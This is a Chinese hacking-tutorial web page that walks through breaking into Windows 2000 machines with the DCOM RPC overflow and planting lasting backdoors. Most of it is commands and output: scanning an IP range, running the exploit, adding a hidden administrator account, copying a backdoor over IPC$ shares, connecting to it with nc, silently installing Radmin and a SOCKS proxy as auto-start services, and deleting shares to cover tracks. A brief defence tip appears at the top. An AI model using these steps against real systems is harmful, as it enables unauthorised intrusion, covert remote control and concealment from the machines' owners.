首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 脚本攻防

教你用RPC漏洞入侵并打造完美后门


http://www.gipsky.com/
RPC漏洞入侵并打造完美后门

来源:Cn.yiyl'Blog



防御办法: 安装rpc补丁

使用防火墙过滤135,445,139等端口

RPC漏洞入侵并打造完美后门!

现在网上很流行dcomrpc,哈哈,那好就说说利用dcomrpc入侵。和入侵之后做的事情 。

需要的工具:

很好的: radmin.exe

扫描工具: retinarpcdcom.exe

溢出攻击工具:RpcDcom(通用溢出工具)

脚本开启telnet工具:telnet.vbe opentelnet.exe resumetelnet.exe

代理:sksockserver.exe

后门程序:WinEggDropShellPro3thVersion

好了,该做的都做的差不多了。现在开始把~~

首先使用retinarpcdcom.exe扫描一个网段。查找有rpc漏洞的机子,这个漏洞需要135端口开放,(想必



随便扫一下就会发现有许多主机开放的135端口)。。。。。。

(人走运座着都能检到钱) 211.217.50.xx 第一个主机就被扫出来又此漏洞。开始工作

看看211.217.50.xx有没有其他的漏洞或是若口令之类的.我们可以使用流光扫描一下, 好了..看样子没有

其他的缺陷,主机开了3389端口,我们可以上去看一下是xp版本还是win2k

哈哈,是win2k server版本

展开命令行:

[查看dcomrpc的用法 用法 dcomrpc -d <host> [options] 

F:\hack>cd rpc\dcomrpc

RPC DCOM Expl01t coded by .:[oc192.us]:. Security

Complied and Modified by Expl01t www.longker.com

Usage:

dcomrpc -d <host> [options]

Options:

  -d:    Hostname to attack [Required]

  -t:    Type [Default: 0]

  -r:    Return address [Default: Selected from target]

  -p:    Attack port [Default: 135]

  -l:    Bindshell port [Default: 666]

Types:

  0 [0x0018759f]: [Win2k-Universal]

  1 [0x0100139d]: [WinXP-Universal]

开始进行溢出:

F:\hack>cd rpc\dcomrpc -d 211.217.50.xx 0

X j,-vl

RPC DCOM remote expl01t - .:[oc192.us]:. Security

Complied and recorrected by Expl01t www.longker.com

[ ] Resolving host..

[ ] Done.

[ ] Expl01ting....Just wait......

等到出现,说明溢出成功

c:\winnt\system32>



接着我们建立用户

c:\winnt\system32>net user blueye$Content$nbsp;1111 /add

命令成功完成。

把用户添加成超级管理员

c:\winnt\system32>net localgroup administrators blueye$Content$nbsp;/add

命令成功完成。

看看共享开了没有,没有的话把共享开开

c:\winnt\system32>net share

清单是空的。

c:\winnt\system32>net share ipc$Content$nbsp;

命令成功完成。

c:\winnt\system32>net share admin$Content$nbsp;

命令成功完成。

到这里我们入侵告一段落

[ 建 立 IPC$Content$nbsp;连 接 ,也可以使用tftp上传 ,先和对方建立连接]

F:\hack>net use \\211.217.50.xx\ipc$Content$nbsp;"1111" /user:blueye$Content$nbsp;

[ 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里]

F:\hack>copy d:\inject.exe \\211.217.50.xx\admin$\system32

F:\hack>copy d:\tback.dll \\211.217.50.xx\admin$\system32

然后运行后门程序,我们可以使用at命令。但是有的机器把at明令禁止了,建议直接开起telnet

使用opentelnet.exe  关闭开启的telnet使用resumetelnet \\ip user password

如果忘记开共享可以使用脚本开启telnet来开共享,用法:

cscript telnet.vbe ip user password null port  (null是验证方式)

F:\hack>opentenet \\211.217.50.xx blueye$Content$nbsp;1111 1 4567

F:\hack>telnet 211.217.50.xx 4567



连接并运行后门程序,运行后门程序命令 根目录:inject.exe -run

(后门使用方法和安装都在zip文件里面包含了)

后门端口123456

F:\hack>nc 211.217.50.xx 123456

       Welcome To WinEggDropShell Matrix Version

[Melody]#



下面安装radmin

配置好的radmin客户端有4个文件。配置radmin客户端可参考相关文章

radmin.reg

raddrv.dll

admdll.dll 

r_server.exe

把这个4个文件copy c:\winnt\system32

在目录下面执行命令

c:\winnt\system32>r_server /s radmin.reg  -----导入注册表

c:\winnt\system32>r_server /install /silence -----安装radmin.并且不显示托盘

c:\winnt\system32>net start r_server ----- 启动服务

可以开启3389的话你自己看着办把,哈哈

安装sock代理

把sksockserver.exe copy c:\winnt\system32

c:\winnt\system32>sksockserver /install         -----安装服务

c:\winnt\system32>sksockserver -config port 1234     ----端口定在1234 自己可以改

c:\winnt\system32>sksockserver -config starttype 2    ----开机自动启动

c:\winnt\system32>net start skserver            ----启动服务

最后删除共享

net share ipc$Content$nbsp;/del

net share admin$Content$nbsp;/del

在安装radmin的时候你发现有人已经安装了。。怎么办?走人?--------NO ?

看操作  (我输入的内容)

后门连接

F:\hack>nc 211.217.50.xx 123456

c\"

       Welcome To WinEggDropShell Matrix Version 13mQvA?-

[Melody]#(pslist)

[Melody]#(pskill r_server)

[Melody]#(shell)

c:\winnt\system32>(del r_server.exe)

c:\winnt\system32>(del admdll.dll)

c:\winnt\system32>(del raddrv.dll)

copy你自己的上去,然后安装

省事的办法直接导入注册表,然后重新输入安装命令运行,就可以了,只是在原来默认端口上面架上了密



等等。。。。为什么我输入导入注册表命令不管用呢?出现什么regedit不是可运行的程序之类的 。

完了,努力白费了。。。。。。。 -----------------------------NO

出现这样的情况最简单的解决办法telnet上去导入试试看,什么?不是把,有没有搞错阿。。

呵呵,尽管放心,去试试看就知道;还可以先运行radmin 然后在radmin的dos下导入,也是可以的。
<< 菜鸟也脱未知加密壳诀窍 网络嗅探Sniffer实例分析 >>
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号